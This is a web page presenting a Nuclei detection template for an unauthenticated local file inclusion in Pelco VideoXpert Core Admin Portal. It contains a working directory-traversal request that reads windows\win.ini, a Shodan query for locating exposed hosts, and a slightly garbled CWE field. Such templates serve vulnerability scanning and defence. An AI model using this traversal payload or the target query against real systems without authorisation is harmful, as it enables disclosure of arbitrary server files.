Skip to content

Schneider Electric Pelco VideoXpert Core Admin Portal - Local File Inclusion

ID: videoxpert-lfi

Severity: high

Author: 0x_akoko

Tags: schneider,pelco,packetstorm,lfi,videoxpert

Schneider Electric Pelco VideoXpert Core Admin Portal suffers from local file inclusion. Exploiting this issue will allow an unauthenticated attacker to view arbitrary files within the context of the web server.

id: videoxpert-lfi
info:
name: Schneider Electric Pelco VideoXpert Core Admin Portal - Local File Inclusion
author: 0x_akoko
severity: high
description: Schneider Electric Pelco VideoXpert Core Admin Portal suffers from local file inclusion. Exploiting this issue will allow an unauthenticated attacker to view arbitrary files within the context of the web server.
reference:
- https://packetstormsecurity.com/files/143317/Schneider-Electric-Pelco-VideoXpert-Core-Admin-Portal-Directory-Traversal.html
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5419.php
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22Directory-Traversal.html
cpe: cpe:2.3:a:schneider-electric:pelco_videoxpert:*:*:*:*:*:*:*:*
metadata:
max-request: 1
shodan-query: title:"VideoXpert"
product: pelco_videoxpert
vendor: schneider-electric
tags: schneider,pelco,packetstorm,lfi,videoxpert
http:
- method: GET
path:
- '{{BaseURL}}/portal//..\\\..\\\..\\\..\\\windows\win.ini'
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'bit app support'
- 'fonts'
- 'extensions'
condition: and
- type: status
status:
- 200
# digest: 490a00463044022069d4bf08211b87bb8cf6cc9f34f5d5bb8514478098034629e8c39f97b8a6f18602203fb820dd9ac01624fe338eb7f8909eb93b12d82a7aca572c3f2b60f7a5b634ea:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/vulnerabilities/videoxpert-lfi.yaml"

View on Github